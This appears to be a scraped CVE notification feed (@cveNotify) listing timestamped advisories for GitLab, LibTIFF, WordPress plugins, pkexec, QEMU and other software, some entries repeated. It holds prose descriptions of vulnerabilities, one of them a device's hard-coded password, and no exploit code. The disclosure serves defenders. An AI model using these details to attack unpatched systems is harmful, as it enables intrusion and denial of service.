🚨 CVE-2022-3411A lack of length validation in GitLab CE/EE affecting all versions from 12.4 before 15.6.7, 15.7 before 15.7.6, and 15.8 before 15.8.1 allows an authenticated attacker to create a large Issue description via GraphQL which, when repeatedly requested, saturates CPU usage.🎖@cveNotify |
|
| 2023-02-14 02:29:59 |
🚨 CVE-2022-3759An issue has been discovered in GitLab CE/EE affecting all versions starting from 14.3 before 15.6.7, all versions starting from 15.7 before 15.7.6, all versions starting from 15.8 before 15.8.1. An attacker may upload a crafted CI job artifact zip file in a project that uses dynamic child pipelines and make a sidekiq job allocate a lot of memory. In GitLab instances where Sidekiq is memory-limited, this may cause Denial of Service.🎖@cveNotify |
|
| 2023-02-14 02:29:57 |
🚨 CVE-2022-4138A Cross Site Request Forgery issue has been discovered in GitLab CE/EE affecting all versions before 15.6.7, all versions starting from 15.7 before 15.7.6, and all versions starting from 15.8 before 15.8.1. An attacker could take over a project if an Owner or Maintainer uploads a file to a malicious project.🎖@cveNotify |
|
| 2023-02-14 02:29:54 |
🚨 CVE-2023-0518An issue has been discovered in GitLab CE/EE affecting all versions starting from 14.0 before 15.6.7, all versions starting from 15.7 before 15.7.6, all versions starting from 15.8 before 15.8.1. It was possible to trigger a DoS attack by uploading a malicious Helm chart.🎖@cveNotify |
|
| 2023-02-14 02:29:52 |
🚨 CVE-2023-0795LibTIFF 4.4.0 has an out-of-bounds read in tiffcrop in tools/tiffcrop.c:3488, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit afaabc3e.🎖@cveNotify |
|
| 2023-02-14 02:29:50 |
🚨 CVE-2023-0796LibTIFF 4.4.0 has an out-of-bounds read in tiffcrop in tools/tiffcrop.c:3592, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit afaabc3e.🎖@cveNotify |
|
| 2023-02-14 02:29:48 |
🚨 CVE-2023-0797LibTIFF 4.4.0 has an out-of-bounds read in tiffcrop in libtiff/tif_unix.c:368, invoked by tools/tiffcrop.c:2903 and tools/tiffcrop.c:6921, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit afaabc3e.🎖@cveNotify |
|
| 2023-02-14 02:29:46 |
🚨 CVE-2023-0798LibTIFF 4.4.0 has an out-of-bounds read in tiffcrop in tools/tiffcrop.c:3400, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit afaabc3e.🎖@cveNotify |
|
| 2023-02-14 02:29:45 |
🚨 CVE-2023-0799LibTIFF 4.4.0 has an out-of-bounds read in tiffcrop in tools/tiffcrop.c:3701, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit afaabc3e.🎖@cveNotify |
|
| 2023-02-14 02:29:43 |
🚨 CVE-2023-0800LibTIFF 4.4.0 has an out-of-bounds write in tiffcrop in tools/tiffcrop.c:3502, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 33aee127.🎖@cveNotify |
|
| 2023-02-14 02:29:42 |
🚨 CVE-2023-0801LibTIFF 4.4.0 has an out-of-bounds write in tiffcrop in libtiff/tif_unix.c:368, invoked by tools/tiffcrop.c:2903 and tools/tiffcrop.c:6778, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 33aee127.🎖@cveNotify |
|
| 2023-02-14 02:29:40 |
🚨 CVE-2023-0802LibTIFF 4.4.0 has an out-of-bounds write in tiffcrop in tools/tiffcrop.c:3724, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 33aee127.🎖@cveNotify |
|
| 2023-02-14 02:29:39 |
🚨 CVE-2023-0803LibTIFF 4.4.0 has an out-of-bounds write in tiffcrop in tools/tiffcrop.c:3516, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 33aee127.🎖@cveNotify |
|
| 2023-02-14 02:29:37 |
🚨 CVE-2023-0804LibTIFF 4.4.0 has an out-of-bounds write in tiffcrop in tools/tiffcrop.c:3609, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 33aee127.🎖@cveNotify |
|
| 2023-02-14 00:29:41 |
🚨 CVE-2021-4034A local privilege escalation vulnerability was found on polkit's pkexec utility. The pkexec application is a setuid tool designed to allow unprivileged users to run commands as privileged users according predefined policies. The current version of pkexec doesn't handle the calling parameters count correctly and ends trying to execute environment variables as commands. An attacker can leverage this by crafting environment variables in such a way it'll induce pkexec to execute arbitrary code. When successfully executed the attack can cause a local privilege escalation given unprivileged users administrative rights on the target machine.🎖@cveNotify |
|
| 2023-02-14 00:29:38 |
🚨 CVE-2023-0776Baicells Nova 436Q, Nova 430E, Nova 430I, and Neutrino 430 LTE TDD eNodeB devices with firmware through QRTB 2.12.7 are vulnerable to remote shell code exploitation via HTTP command injections. Commands are executed using pre-login execution and executed with root permissions. The following methods below have been tested and validated by a 3rd party analyst and has been confirmed exploitable special thanks to Rustam Amin for providing the steps to reproduce.🎖@cveNotify |
|
| 2023-02-13 21:29:55 |
🚨 CVE-2023-0810Cross-site Scripting (XSS) - Stored in GitHub repository btcpayserver/btcpayserver prior to 1.7.11.🎖@cveNotify |
|
| 2023-02-13 21:29:54 |
🚨 CVE-2023-23948The ownCloud Android app allows ownCloud users to access, share, and edit files and folders. Version 2.21.1 of the ownCloud Android app is vulnerable to SQL injection in `FileContentProvider.kt`. This issue can lead to information disclosure. Two databases, `filelist` and `owncloud_database`, are affected. In version 3.0, the `filelist` database was deprecated. However, injections affecting `owncloud_database` remain relevant as of version 3.0.🎖@cveNotify |
|
| 2023-02-13 21:29:53 |
🚨 CVE-2023-24804The ownCloud Android app allows ownCloud users to access, share, and edit files and folders. Prior to version 3.0, the app has an incomplete fix for a path traversal issue and is vulnerable to two bypass methods. The bypasses may lead to information disclosure when uploading the app’s internal files, and to arbitrary file write when uploading plain text files (although limited by the .txt extension). Version 3.0 fixes the reported bypasses.🎖@cveNotify |
|
| 2023-02-13 21:29:52 |
🚨 CVE-2023-22854The ccmweb component of Mitel MiContact Center Business server 9.2.2.0 through 9.4.1.0 could allow an unauthenticated attacker to download arbitrary files, due to insufficient restriction of URL parameters. A successful exploit could allow access to sensitive information.🎖@cveNotify |
|
| 2023-02-13 21:29:48 |
🚨 CVE-2023-23551Control By Web X-600M devices run Lua scripts and are vulnerable to code injection, which could allow an attacker to remotely execute arbitrary code.🎖@cveNotify |
|
| 2023-02-13 21:29:47 |
🚨 CVE-2022-3891The WP FullCalendar WordPress plugin before 1.5 does not ensure that the post retrieved via an AJAX action is public and can be accessed by the user making the request, allowing unauthenticated attackers to get the content of arbitrary posts, including draft/private as well as password-protected ones.🎖@cveNotify |
|
| 2023-02-13 21:29:46 |
🚨 CVE-2022-4445The FL3R FeelBox WordPress plugin through 8.1 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.🎖@cveNotify |
|
| 2023-02-13 21:29:42 |
🚨 CVE-2022-4448The GiveWP WordPress plugin before 2.24.0 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2023-02-13 21:29:41 |
🚨 CVE-2022-4471The YARPP WordPress plugin through 5.30.1 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.🎖@cveNotify |
|
| 2023-02-13 21:29:40 |
🚨 CVE-2022-4488The Widgets on Pages WordPress plugin through 1.6.0 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.🎖@cveNotify |
|
| 2023-02-13 21:29:36 |
🚨 CVE-2022-4551The Rich Table of Contents WordPress plugin through 1.3.7 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.🎖@cveNotify |
|
| 2023-02-13 21:29:35 |
🚨 CVE-2022-4580The Twenty20 Image Before-After WordPress plugin through 1.5.9 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2023-02-13 19:29:47 |
🚨 CVE-2022-48077Genymotion Desktop v3.3.2 was discovered to contain a DLL hijacking vulnerability that allows attackers to escalate privileges and execute arbitrary code via a crafted DLL.🎖@cveNotify |
|
| 2023-02-13 19:29:46 |
🚨 CVE-2023-0810Cross-site Scripting (XSS) - Stored in GitHub repository btcpayserver/btcpayserver prior to 1.7.11.🎖@cveNotify |
|
| 2023-02-13 19:29:44 |
🚨 CVE-2023-23948The ownCloud Android app allows ownCloud users to access, share, and edit files and folders. Version 2.21.1 of the ownCloud Android app is vulnerable to SQL injection in `FileContentProvider.kt`. This issue can lead to information disclosure. Two databases, `filelist` and `owncloud_database`, are affected. In version 3.0, the `filelist` database was deprecated. However, injections affecting `owncloud_database` remain relevant as of version 3.0.🎖@cveNotify |
|
| 2023-02-13 19:29:43 |
🚨 CVE-2023-24804The ownCloud Android app allows ownCloud users to access, share, and edit files and folders. Prior to version 3.0, the app has an incomplete fix for a path traversal issue and is vulnerable to two bypass methods. The bypasses may lead to information disclosure when uploading the app’s internal files, and to arbitrary file write when uploading plain text files (although limited by the .txt extension). Version 3.0 fixes the reported bypasses.🎖@cveNotify |
|
| 2023-02-13 19:29:42 |
🚨 CVE-2023-25159Nextcloud Server is the file server software for Nextcloud, a self-hosted productivity platform, and Nextcloud Office is a document collaboration app for the same platform. Nextcloud Server 24.0.x prior to 24.0.8 and 25.0.x prior to 25.0.1, Nextcloud Enterprise Server 24.0.x prior to 24.0.8 and 25.0.x prior to 25.0.1, and Nextcloud Office (Richdocuments) App 6.x prior to 6.3.1 and 7.x prior to 7.0.1 have previews accessible without a watermark. The download should be hidden and the watermark should get applied. This issue is fixed in Nextcloud Server 25.0.1 and 24.0.8, Nextcloud Enterprise Server 25.0.1 and 24.0.8, and Nextcloud Office (Richdocuments) App 7.0.1 (for 25) and 6.3.1 (for 24). No known workarounds are available.🎖@cveNotify |
|
| 2023-02-13 19:29:40 |
🚨 CVE-2022-27628Cross-Site Request Forgery (CSRF) vulnerability in AA-Team WZone – Lite Version plugin 3.1 Lite versions.🎖@cveNotify |
|
| 2023-02-13 19:29:39 |
🚨 CVE-2022-45722ezEIP v5.3.0(0649) was discovered to contain a cross-site scripting (XSS) vulnerability.🎖@cveNotify |
|
| 2023-02-13 18:30:00 |
🚨 CVE-2022-4488The Widgets on Pages WordPress plugin through 1.6.0 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.🎖@cveNotify |
|
| 2023-02-13 18:29:59 |
🚨 CVE-2022-4512The Better Font Awesome WordPress plugin before 2.0.4 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-02-13 18:29:57 |
🚨 CVE-2022-4546The Mapwiz WordPress plugin through 1.0.1 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.🎖@cveNotify |
|
| 2023-02-13 18:29:56 |
🚨 CVE-2022-4551The Rich Table of Contents WordPress plugin through 1.3.7 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.🎖@cveNotify |
|
| 2023-02-13 18:29:55 |
🚨 CVE-2022-4562The Meks Flexible Shortcodes WordPress plugin before 1.3.5 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.🎖@cveNotify |
|
| 2023-02-13 18:29:54 |
🚨 CVE-2022-4580The Twenty20 Image Before-After WordPress plugin through 1.5.9 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2023-02-13 18:29:53 |
🚨 CVE-2022-4628The Easy PayPal Buy Now Button WordPress plugin before 1.7.4 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2023-02-13 18:29:52 |
🚨 CVE-2022-4656The WP Visitor Statistics (Real Time Traffic) WordPress plugin before 6.5 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.🎖@cveNotify |
|
| 2023-02-13 18:29:50 |
🚨 CVE-2022-4678The TemplatesNext ToolKit WordPress plugin before 3.2.8 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-02-13 18:29:49 |
🚨 CVE-2022-4682The Lightbox Gallery WordPress plugin before 0.9.5 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2023-02-13 18:29:47 |
🚨 CVE-2022-4745The WP Customer Area WordPress plugin before 8.1.4 does not have CSRF checks when performing some actions such as chmod, mkdir and copy, which could allow attackers to make a logged-in admin perform them and create arbitrary folders, copy file for example.🎖@cveNotify |
|
| 2023-02-13 18:29:46 |
🚨 CVE-2022-4759The GigPress WordPress plugin before 2.3.28 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2023-02-13 18:29:45 |
🚨 CVE-2022-4783The Youtube Channel Gallery WordPress plugin through 2.4 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2023-02-13 18:29:44 |
🚨 CVE-2022-4830The Paid Memberships Pro WordPress plugin before 2.9.9 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.🎖@cveNotify |
|
| 2023-02-13 18:29:42 |
🚨 CVE-2023-0034The JetWidgets For Elementor WordPress plugin through 1.0.13 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2023-02-13 18:29:41 |
🚨 CVE-2023-0060The Responsive Gallery Grid WordPress plugin before 2.3.9 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-02-13 18:29:40 |
🚨 CVE-2023-0061The Judge.me Product Reviews for WooCommerce WordPress plugin before 1.3.21 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-02-13 18:29:39 |
🚨 CVE-2023-0075The Amazon JS WordPress plugin through 0.10 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-02-13 18:29:38 |
🚨 CVE-2023-0080The Customer Reviews for WooCommerce WordPress plugin before 5.16.0 does not validate one of its shortcode attribute, which could allow users with a contributor role and above to include arbitrary files via a traversal attack. This could also allow them to read non PHP files and retrieve their content. RCE could also be achieved if the attacker manage to upload a malicious image containing PHP code, and then include it via the affected attribute, on a default WP install, authors could easily achieve that given that they have the upload_file capability.🎖@cveNotify |
|
| 2023-02-13 18:29:37 |
🚨 CVE-2023-0098The Simple URLs WordPress plugin before 115 does not escape some parameters before using them in various SQL statements used by AJAX actions available by any authenticated users, leading to a SQL injection exploitable by low privilege users such as subscriber.🎖@cveNotify |
|
| 2023-02-13 16:29:37 |
🚨 CVE-2023-0400The protection bypass vulnerability in DLP for Windows 11.9.x is addressed in version 11.10.0. This allowed a local user to bypass DLP controls when uploading sensitive data from a mapped drive into a web email client. Loading from a local driver was correctly prevented. Versions prior to 11.9 correctly detected and blocked the attempted upload of sensitive data.🎖@cveNotify |
|
| 2023-02-13 16:29:36 |
🚨 CVE-2022-45724Incorrect Access Control in Comfast router CF-WR6110N V2.3.1 allows a remote attacker on the same network to perform any HTTP request to an unauthenticated page to force the server to generate a SESSION_ID, and using this SESSION_ID an attacker can then perform authenticated requests.🎖@cveNotify |
|
| 2023-02-13 16:29:35 |
🚨 CVE-2022-45725Improper Input Validation in Comfast router CF-WR6110N V2.3.1 allows a remote attacker on the same network to execute arbitrary code on the target via an HTTP POST request🎖@cveNotify |
|
| 2023-02-13 14:30:06 |
🚨 CVE-2023-0808A vulnerability was found in Deye/Revolt/Bosswerk Inverter MW3_15U_5406_1.47/MW3_15U_5406_1.471. It has been rated as problematic. This issue affects some unknown processing of the component Access Point Setting Handler. The manipulation with the input 12345678 leads to use of hard-coded password. It is possible to launch the attack on the physical device. The exploit has been disclosed to the public and may be used. Upgrading to version MW3_16U_5406_1.53 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-220769 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-13 14:30:04 |
🚨 CVE-2023-25727In phpMyAdmin before 4.9.11 and 5.x before 5.2.1, an authenticated user can trigger XSS by uploading a crafted .sql file through the drag-and-drop interface.🎖@cveNotify |
|
| 2023-02-13 14:30:01 |
🚨 CVE-2023-23697Dell Command | Intel vPro Out of Band, versions before 4.4.0, contain an arbitrary folder delete vulnerability during uninstallation. A locally authenticated malicious user may potentially exploit this vulnerability leading to arbitrary folder deletion.🎖@cveNotify |
|
| 2023-02-13 14:29:58 |
🚨 CVE-2023-24572Dell Command | Integration Suite for System Center, versions before 6.4.0 contain an arbitrary folder delete vulnerability during uninstallation. A locally authenticated malicious user may potentially exploit this vulnerability leading to arbitrary folder deletion.🎖@cveNotify |
|
| 2023-02-13 13:30:16 |
🚨 CVE-2022-34397Dell Unisphere for PowerMax vApp, VASA Provider vApp, and Solution Enabler vApp version 10.0.0.5 and below contains an authorization bypass vulnerability, allowing users to perform actions in which they are not authorized.🎖@cveNotify |
|
| 2023-02-13 13:30:15 |
🚨 CVE-2022-45454Sensitive information disclosure due to insecure folder permissions. The following products are affected: Acronis Agent (Windows) before build 30161, Acronis Cyber Protect 15 (Windows) before build 30984.🎖@cveNotify |
|
| 2023-02-13 13:30:14 |
🚨 CVE-2022-45455Local privilege escalation due to incomplete uninstallation cleanup. The following products are affected: Acronis Cyber Protect Home Office (Windows) before build 40107, Acronis Agent (Windows) before build 30025, Acronis Cyber Protect 15 (Windows) before build 30984.🎖@cveNotify |
|
| 2023-02-13 13:30:12 |
🚨 CVE-2023-23697Dell Command | Intel vPro Out of Band, versions before 4.4.0, contain an arbitrary folder delete vulnerability during uninstallation. A locally authenticated malicious user may potentially exploit this vulnerability leading to arbitrary folder deletion.🎖@cveNotify |
|
| 2023-02-13 13:30:11 |
🚨 CVE-2023-24572Dell Command | Integration Suite for System Center, versions before 6.4.0 contain an arbitrary folder delete vulnerability during uninstallation. A locally authenticated malicious user may potentially exploit this vulnerability leading to arbitrary folder deletion.🎖@cveNotify |
|
| 2023-02-13 13:30:10 |
🚨 CVE-2023-25727In phpMyAdmin before 4.9.11 and 5.x before 5.2.1, an authenticated user can trigger XSS by uploading a crafted .sql file through the drag-and-drop interface.🎖@cveNotify |
|
| 2023-02-13 07:30:42 |
🚨 CVE-2018-1118Linux kernel vhost since version 4.8 does not properly initialize memory in messages passed between virtual guests and the host operating system in the vhost/vhost.c:vhost_new_msg() function. This can allow local privileged users to read some kernel memory contents when reading from the /dev/vhost-net device file.🎖@cveNotify |
|
| 2023-02-13 07:30:41 |
🚨 CVE-2018-1075ovirt-engine up to version 4.2.3 is vulnerable to an unfiltered password when choosing manual db provisioning. When engine-setup was run and one chooses to provision the database manually or connect to a remote database, the password input was logged in cleartext during the verification step. Sharing the provisioning log might inadvertently leak database passwords.🎖@cveNotify |
|
| 2023-02-13 07:30:37 |
🚨 CVE-2018-1100zsh through version 5.4.2 is vulnerable to a stack-based buffer overflow in the utils.c:checkmailpath function. A local attacker could exploit this to execute arbitrary code in the context of another user.🎖@cveNotify |
|
| 2023-02-13 07:30:36 |
🚨 CVE-2018-1097A flaw was found in foreman before 1.16.1. The issue allows users with limited permissions for powering oVirt/RHV hosts on and off to discover the username and password used to connect to the compute resource.🎖@cveNotify |
|
| 2023-02-13 07:30:35 |
🚨 CVE-2018-1098A cross-site request forgery flaw was found in etcd 3.3.1 and earlier. An attacker can set up a website that tries to send a POST request to the etcd server and modify a key. Adding a key is done with PUT so it is theoretically safe (can't PUT from an HTML form or such) but POST allows creating in-order keys that an attacker can send.🎖@cveNotify |
|
| 2023-02-13 07:30:33 |
🚨 CVE-2018-1065The netfilter subsystem in the Linux kernel through 4.15.7 mishandles the case of a rule blob that contains a jump but lacks a user-defined chain, which allows local users to cause a denial of service (NULL pointer dereference) by leveraging the CAP_NET_RAW or CAP_NET_ADMIN capability, related to arpt_do_table in net/ipv4/netfilter/arp_tables.c, ipt_do_table in net/ipv4/netfilter/ip_tables.c, and ip6t_do_table in net/ipv6/netfilter/ip6_tables.c.🎖@cveNotify |
|
| 2023-02-13 07:30:29 |
🚨 CVE-2018-16866An out of bounds read was discovered in systemd-journald in the way it parses log messages that terminate with a colon ':'. A local attacker can use this flaw to disclose process memory data. Versions from v221 to v239 are vulnerable.🎖@cveNotify |
|
| 2023-02-13 07:30:28 |
🚨 CVE-2018-16885A flaw was found in the Linux kernel that allows the userspace to call memcpy_fromiovecend() and similar functions with a zero offset and buffer length which causes the read beyond the buffer boundaries, in certain cases causing a memory access fault and a system halt by accessing invalid memory address. This issue only affects kernel version 3.10.x as shipped with Red Hat Enterprise Linux 7.🎖@cveNotify |
|
| 2023-02-13 07:30:27 |
🚨 CVE-2018-16889Ceph does not properly sanitize encryption keys in debug logging for v4 auth. This results in the leaking of encryption key information in log files via plaintext. Versions up to v13.2.4 are vulnerable.🎖@cveNotify |
|
| 2023-02-13 07:30:26 |
🚨 CVE-2018-16865An allocation of memory without limits, that could result in the stack clashing with another memory region, was discovered in systemd-journald when many entries are sent to the journal socket. A local attacker, or a remote one if systemd-journal-remote is used, may use this flaw to crash systemd-journald or execute code with journald privileges. Versions through v240 are vulnerable.🎖@cveNotify |
|
| 2023-02-13 07:30:22 |
🚨 CVE-2018-1047A flaw was found in Wildfly 9.x. A path traversal vulnerability through the org.wildfly.extension.undertow.deployment.ServletResourceManager.getResource method could lead to information disclosure of arbitrary local files.🎖@cveNotify |
|
| 2023-02-13 07:30:21 |
🚨 CVE-2018-14659The Gluster file system through versions 4.1.4 and 3.1.2 is vulnerable to a denial of service attack via use of the 'GF_XATTR_IOSTATS_DUMP_KEY' xattr. A remote, authenticated attacker could exploit this by mounting a Gluster volume and repeatedly calling 'setxattr(2)' to trigger a state dump and create an arbitrary number of files in the server's runtime directory.🎖@cveNotify |
|
| 2023-02-13 07:30:20 |
🚨 CVE-2018-16838A flaw was found in sssd Group Policy Objects implementation. When the GPO is not readable by SSSD due to a too strict permission settings on the server side, SSSD will allow all authenticated users to login instead of denying access.🎖@cveNotify |
|
| 2023-02-13 07:30:18 |
🚨 CVE-2018-14654The Gluster file system through version 4.1.4 is vulnerable to abuse of the 'features/index' translator. A remote attacker with access to mount volumes could exploit this via the 'GF_XATTROP_ENTRY_IN_KEY' xattrop to create arbitrary, empty files on the target server.🎖@cveNotify |
|
| 2023-02-13 07:30:16 |
🚨 CVE-2018-14660A flaw was found in glusterfs server through versions 4.1.4 and 3.1.2 which allowed repeated usage of GF_META_LOCK_KEY xattr. A remote, authenticated attacker could use this flaw to create multiple locks for single inode by using setxattr repetitively resulting in memory exhaustion of glusterfs server node.🎖@cveNotify |
|
| 2023-02-13 07:30:12 |
🚨 CVE-2018-14625A flaw was found in the Linux Kernel where an attacker may be able to have an uncontrolled read to kernel-memory from within a vm guest. A race condition between connect() and close() function may allow an attacker using the AF_VSOCK protocol to gather a 4 byte information leak or possibly intercept or corrupt AF_VSOCK messages destined to other clients.🎖@cveNotify |
|
| 2023-02-13 02:30:10 |
🚨 CVE-2015-7529sosreport in SoS 3.x allows local users to obtain sensitive information from sosreport files or gain privileges via a symlink attack on an archive file in a temporary directory, as demonstrated by sosreport-$hostname-$date.tar in /tmp/sosreport-$hostname-$date.🎖@cveNotify |
|
| 2023-02-13 02:30:09 |
🚨 CVE-2015-7549The MSI-X MMIO support in hw/pci/msix.c in QEMU (aka Quick Emulator) allows local guest OS privileged users to cause a denial of service (NULL pointer dereference and QEMU process crash) by leveraging failure to define the .write method.🎖@cveNotify |
|
| 2023-02-13 02:30:08 |
🚨 CVE-2015-7544redhat-support-plugin-rhev in Red Hat Enterprise Virtualization Manager (aka RHEV Manager) before 3.6 allows remote authenticated users with the SuperUser role on any Entity to execute arbitrary commands on any host in the RHEV environment.🎖@cveNotify |
|
| 2023-02-13 02:30:06 |
🚨 CVE-2015-7512Buffer overflow in the pcnet_receive function in hw/net/pcnet.c in QEMU, when a guest NIC has a larger MTU, allows remote attackers to cause a denial of service (guest OS crash) or execute arbitrary code via a large packet.🎖@cveNotify |
|
| 2023-02-13 02:30:05 |
🚨 CVE-2015-7504Heap-based buffer overflow in the pcnet_receive function in hw/net/pcnet.c in QEMU allows guest OS administrators to cause a denial of service (instance crash) or possibly execute arbitrary code via a series of packets in loopback mode.🎖@cveNotify |
|
| 2023-02-13 02:30:04 |
🚨 CVE-2015-7499Heap-based buffer overflow in the xmlGROW function in parser.c in libxml2 before 2.9.3 allows context-dependent attackers to obtain sensitive process memory information via unspecified vectors.🎖@cveNotify |
|
| 2023-02-13 02:30:03 |
🚨 CVE-2015-7500The xmlParseMisc function in parser.c in libxml2 before 2.9.3 allows context-dependent attackers to cause a denial of service (out-of-bounds heap read) via unspecified vectors related to incorrect entities boundaries and start tags.🎖@cveNotify |
|
| 2023-02-13 02:30:02 |
🚨 CVE-2015-7502Red Hat CloudForms 3.2 Management Engine (CFME) 5.4.4 and CloudForms 4.0 Management Engine (CFME) 5.5.0 do not properly encrypt data in the backend PostgreSQL database, which might allow local users to obtain sensitive data and consequently gain privileges by leveraging access to (1) database exports or (2) log files.🎖@cveNotify |
|
| 2023-02-13 02:30:01 |
🚨 CVE-2015-5302libreport 2.0.7 before 2.6.3 only saves changes to the first file when editing a crash report, which allows remote attackers to obtain sensitive information via unspecified vectors related to the (1) backtrace, (2) cmdline, (3) environ, (4) open_fds, (5) maps, (6) smaps, (7) hostname, (8) remote, (9) ks.cfg, or (10) anaconda-tb file attachment included in a Red Hat Bugzilla bug report.🎖@cveNotify |
|
| 2023-02-13 02:30:00 |
🚨 CVE-2015-5292Memory leak in the Privilege Attribute Certificate (PAC) responder plugin (sssd_pac_plugin.so) in System Security Services Daemon (SSSD) 1.10 before 1.13.1 allows remote authenticated users to cause a denial of service (memory consumption) via a large number of logins that trigger parsing of PAC blobs during Kerberos authentication.🎖@cveNotify |
|
| 2023-02-13 02:29:59 |
🚨 CVE-2015-5313Directory traversal vulnerability in the virStorageBackendFileSystemVolCreate function in storage/storage_backend_fs.c in libvirt, when fine-grained Access Control Lists (ACL) are in effect, allows local users with storage_vol:create ACL but not domain:write permission to write to arbitrary files via a .. (dot dot) in a volume name.🎖@cveNotify |
|
| 2023-02-13 02:29:58 |
🚨 CVE-2015-5295The template-validate command in OpenStack Orchestration API (Heat) before 2015.1.3 (kilo) and 5.0.x before 5.0.1 (liberty) allows remote authenticated users to cause a denial of service (memory consumption) or determine the existence of local files via the resource type in a template, as demonstrated by file:///dev/zero.🎖@cveNotify |
|
| 2023-02-13 02:29:57 |
🚨 CVE-2015-5329The TripleO Heat templates (tripleo-heat-templates), as used in Red Hat Enterprise Linux OpenStack Platform 7.0, do not properly use the configured RabbitMQ credentials, which makes it easier for remote attackers to obtain access to services in deployed overclouds by leveraging knowledge of the default credentials.🎖@cveNotify |
|
| 2023-02-13 02:29:55 |
🚨 CVE-2015-5305Directory traversal vulnerability in Kubernetes, as used in Red Hat OpenShift Enterprise 3.0, allows attackers to write to arbitrary files via a crafted object type name, which is not properly handled before passing it to etcd.🎖@cveNotify |
|
| 2023-02-13 02:29:54 |
🚨 CVE-2015-5233Foreman before 1.8.4 and 1.9.x before 1.9.1 do not properly apply view_hosts permissions, which allows (1) remote authenticated users with the view_reports permission to read reports from arbitrary hosts or (2) remote authenticated users with the destroy_reports permission to delete reports from arbitrary hosts via direct access to the (a) individual report show/delete pages or (b) APIs.🎖@cveNotify |
|
| 2023-02-13 02:29:53 |
🚨 CVE-2015-5279Heap-based buffer overflow in the ne2000_receive function in hw/net/ne2000.c in QEMU before 2.4.0.1 allows guest OS users to cause a denial of service (instance crash) or possibly execute arbitrary code via vectors related to receiving packets.🎖@cveNotify |
|
| 2023-02-13 02:29:52 |
🚨 CVE-2015-5274rubygem-openshift-origin-console in Red Hat OpenShift 2.2 allows remote authenticated users to execute arbitrary commands via a crafted request to the Broker.🎖@cveNotify |
|
| 2023-02-13 02:29:51 |
